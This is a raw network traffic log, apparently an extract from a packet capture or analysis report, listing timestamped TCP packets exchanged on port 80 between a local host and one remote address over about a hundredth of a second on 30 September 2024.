Sep 30, 2024 15:10:15.139024973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139044046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139062881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139070988 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.139070988 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.139070988 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.139095068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139113903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139131069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139148951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139166117 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139213085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139230967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139240980 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.139260054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139375925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139410973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.139410973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.139410973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.139580011 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.139812946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139863968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139882088 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139899969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140017986 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.140187979 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.140269995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140315056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140333891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140353918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140374899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140393019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140414000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140431881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140450001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140455961 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.140475988 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140495062 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140516043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140533924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140552998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140571117 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140626907 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.140626907 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.140795946 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.140816927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140860081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140913963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140933037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140952110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140965939 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.140978098 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.140995979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141014099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141031981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141050100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141138077 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.141180038 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141221046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141307116 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.141307116 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.141307116 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.141340017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141387939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141443014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141460896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141475916 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.141486883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141544104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141647100 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.141647100 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.141647100 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.141680956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141727924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141815901 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.141936064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141956091 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141973972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.141985893 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.142000914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142035961 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142151117 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142155886 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.142277002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142327070 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.142327070 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.142445087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142496109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.142538071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142580986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142652035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142666101 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.142709017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142811060 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142829895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142837048 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.142837048 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.142955065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142973900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.142992973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143007040 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.143007040 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.143007040 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.143131018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143156052 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143174887 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143177986 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.143199921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143218040 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143235922 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143254042 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143271923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143290997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143310070 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143327951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143347025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143352032 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.143352032 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.143352032 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.143378973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143414021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143459082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143477917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143496037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143513918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143517971 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.143568039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143584967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143603086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143621922 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143640041 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143656969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143687010 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.143687010 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.143717051 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143827915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143847942 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143856049 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.143874884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143893957 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143912077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143930912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.143949032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144026995 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.144153118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144207954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.144207954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.144207954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.144288063 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144336939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144356012 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144366026 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.144382954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144402027 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144435883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144454002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144473076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144536972 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.144546986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144593000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144612074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144629955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144648075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144665956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144684076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144701958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144706011 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.144706964 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.144821882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144840956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.144876003 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.145045996 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.145046949 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.145369053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145430088 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145450115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145467997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145486116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145503998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145556927 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.145617962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145677090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145695925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145714045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145729065 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.145756960 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145804882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145823956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145842075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145896912 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.145896912 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.145898104 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.145921946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145956993 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145976067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.145992994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146012068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146064997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146068096 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.146090031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146109104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146126986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146161079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146179914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146218061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146238089 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146241903 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.146241903 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.146241903 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.146285057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146328926 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146348000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146365881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146406889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.146576881 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.146576881 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.146576881 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.146697998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146806002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146862030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146879911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146898031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146917105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.146919012 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.146940947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147011042 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147028923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147089005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147092104 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.147114038 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147131920 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147150040 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147169113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147186995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147206068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147223949 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147243023 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147257090 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.147257090 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.147301912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147427082 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.147595882 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.147710085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147804976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147862911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147881031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147898912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147918940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147936106 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.147979021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.147985935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.148070097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148088932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148108006 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148125887 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148144007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148154974 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.148169994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148230076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148247957 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148266077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148325920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.148325920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.148397923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148416996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148435116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148494959 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.148664951 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.148664951 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.148839951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148859024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148889065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148906946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148926020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148945093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148962975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.148979902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149004936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.149004936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.149023056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149071932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149101973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.149126053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149143934 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149163008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149275064 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.149275064 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.149318933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149369001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149388075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149439096 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149442911 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.149496078 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149514914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149612904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.149612904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.149732113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149750948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149769068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149782896 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.149899006 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149918079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149935961 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149952888 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.149961948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.149981022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150122881 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.150293112 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.150312901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150330067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150348902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150382996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150401115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150418997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150435925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150454044 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150475025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150494099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150533915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150588036 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150605917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150624990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150634050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.150634050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.150677919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150732040 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150751114 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150768995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150788069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150804043 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.150815010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150834084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150851965 CEST	80	49754	172.67.215.93	192.168.11.20
